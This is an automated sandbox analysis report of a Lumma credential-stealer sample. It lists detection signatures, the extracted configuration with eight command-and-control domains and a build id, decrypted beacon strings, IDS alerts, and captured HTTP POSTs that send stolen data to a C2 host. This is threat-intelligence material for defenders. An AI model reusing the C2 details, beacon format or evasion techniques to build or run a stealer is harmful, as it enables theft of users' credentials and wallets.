
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546270
MD5: 55bfaa52fb91ccaa609fda3e4ba384f1
SHA1: 82e95791abe38fd20575fb1a92d9a51030012f61
SHA256: 8461b98ede75eee3c04396a1600422e47a21eb3d575ec02b3a913e66dbda3749
Tags: exe, user-Bitsight
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 1532 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 55BFAA52FB91CCAA609FDA3E4BA384F1)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration: {"C2 url": ["founpiuer.store", "navygenerayk.store", "thumbystriw.store", "necklacedmny.store", "presticitpo.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(only the first 5 of 50 memory-dump entries are listed here)
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T17:26:19.694593+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 49711 | TCP
2024-10-31T17:26:58.088523+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.5 | 49910 | TCP
2024-10-31T17:26:03.499606+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:05.047853+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:07.427537+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:09.643578+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:11.826936+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:14.841620+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:16.600929+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49710 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:18.763888+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:04.312757+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:06.296342+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:04.312757+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:06.296342+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:03.499606+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:05.047853+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49705 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:07.427537+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49706 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:09.643578+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49707 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:11.826936+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49708 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:14.841620+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:16.600929+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49710 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:18.763888+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49713 | 188.114.97.3 | 443 | TCP
2024-10-31T17:26:02.797778+0100 | 2057129 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55927 | 1.1.1.1 | 53 | UDP
2024-10-31T17:26:02.812763+0100 | 2057127 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 62287 | 1.1.1.1 | 53 | UDP
2024-10-31T17:26:02.837665+0100 | 2057123 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 51900 | 1.1.1.1 | 53 | UDP
2024-10-31T17:26:02.774640+0100 | 2057131 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60947 | 1.1.1.1 | 53 | UDP
2024-10-31T17:26:02.824202+0100 | 2057125 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56217 | 1.1.1.1 | 53 | UDP
2024-10-31T17:26:10.884020+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 188.114.97.3 | 443 | TCP



              AV Detection

Source: file.exe | Avira: detected
Source: file.exe.1532.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "navygenerayk.store", "thumbystriw.store", "necklacedmny.store", "presticitpo.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\CEF
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Google

              Networking

Source: Network traffic | Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:55927 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:60947 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:56217 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62287 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:51900 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49713 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49707 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49711
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49910
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 52; Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 12840; Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 15082; Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 20572; Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 1267; Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: multipart/form-data; boundary=be85de5ipdocierre1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 585874; Host: necklacedmny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic | DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic | DNS traffic detected: DNS query: necklacedmny.store
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1; Connection: Keep-Alive; Content-Type: application/x-www-form-urlencoded; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36; Content-Length: 8; Host: necklacedmny.store
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202261431.0000000001421000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, file.exe, 00000000.00000003.2081624288.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153793686.0000000001432000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128973004.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store//
Source: file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/7
Source: file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/O
